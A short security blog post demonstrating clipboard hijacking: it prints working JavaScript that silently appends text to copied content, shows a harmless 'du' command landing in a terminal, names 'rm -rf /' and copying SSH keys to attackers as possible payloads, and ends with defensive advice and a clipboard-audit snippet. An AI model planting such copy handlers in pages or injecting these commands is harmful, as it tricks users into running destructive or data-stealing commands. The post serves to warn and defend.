Malicious Copy and Paste Appending

Earlier today I was reading this article on Rollingstone.com about how FXX plans to show all 552 episodes of The Simpsons this August and noticed that when I copied anything from the website it appends a link and copyright notice. That got me thinking about what else could be appended to copied text and how bad guys could use it.

So after a little looking around I found this JavaScript that will append text to anything copied. To test my theory out I set up a secondary Tumblr account called badcopypaste.tumblr.com and added this JavaScript to the head of the document:

<script type="text/javascript">
// Copy handler: swaps the user's selection for "selection + appended text".
function addLink() {
    var body_element = document.getElementsByTagName('body')[0];
    var selection;
    selection = window.getSelection();
    var pagelink = "<br></br> du <br></br>"; // change this if you want
    var copytext = selection + pagelink;
    // Off-screen div holds the modified text so it is never visible on the page.
    var newdiv = document.createElement('div');
    newdiv.style.position = 'absolute';
    newdiv.style.left = '-99999px';
    body_element.appendChild(newdiv);
    newdiv.innerHTML = copytext;
    // Select the hidden div so the browser copies it instead of the original selection.
    selection.selectAllChildren(newdiv);
    // Remove the div once the copy has completed.
    window.setTimeout(function() {
        body_element.removeChild(newdiv);
    }, 0);
}
document.oncopy = addLink;
</script>

and posted this post:

image

When you copy and paste the echo $PATH command in Firefox and Chrome you get this:

echo $PATH

du

If you copy and paste directly into a terminal window you get this:

In the JavaScript I added a non-malicious du command as an example. You can't see it until you have already pasted it, and it could just as easily have been rm -rf / or a command to SCP all your SSH keys to "The Bad Guys™".

That is why it is always a good idea to paste all commands into a notepad and not directly into a terminal, and a dumb idea to let JavaScript add information to your clipboard.
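The notepad check above can be automated by comparing what was visibly selected with what actually landed on the clipboard. This is an added example, not code from the original post; the function names, result fields and the sample strings are assumptions built to mirror the echo $PATH test.

```javascript
// Added example; names are illustrative and not from the original post.
// Matches C0 control characters other than tab and newline, plus DEL.
const CONTROL_CHARS = /[\u0000-\u0008\u000b-\u001f\u007f]/;

// Treat CRLF and bare CR as LF so line comparisons are stable.
function normalize(text) {
  return text.replace(/\r\n?/g, "\n");
}

// Split into trimmed lines and drop the empty ones.
function nonEmptyLines(text) {
  return text.split("\n").map((l) => l.trim()).filter((l) => l.length > 0);
}

// Compare the text the user selected with the text that reached the clipboard.
function auditClipboard(selectedText, clipboardText) {
  const selected = normalize(selectedText);
  const clip = normalize(clipboardText);
  const seen = new Set(nonEmptyLines(selected));
  const extraLines = nonEmptyLines(clip).filter((l) => !seen.has(l));
  const findings = [];

  if (clip !== selected) {
    findings.push("clipboard differs from the visible selection");
  }
  if (extraLines.length > 0) {
    findings.push("lines not in the selection: " + JSON.stringify(extraLines));
  }
  if (CONTROL_CHARS.test(clip)) {
    findings.push("clipboard contains control characters");
  }
  // A newline makes a shell run the preceding line as soon as it is pasted.
  const executesOnPaste = clip.includes("\n");
  if (executesOnPaste && !selected.includes("\n")) {
    findings.push("newline added: a terminal would run this without Enter");
  }
  return { safe: findings.length === 0, extraLines, executesOnPaste, findings };
}

// Constructed sample: the selection from the post and the text that was pasted.
const sample = auditClipboard("echo $PATH", "echo $PATH\n\ndu\n");
console.log(sample.findings.join("\n"));
```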
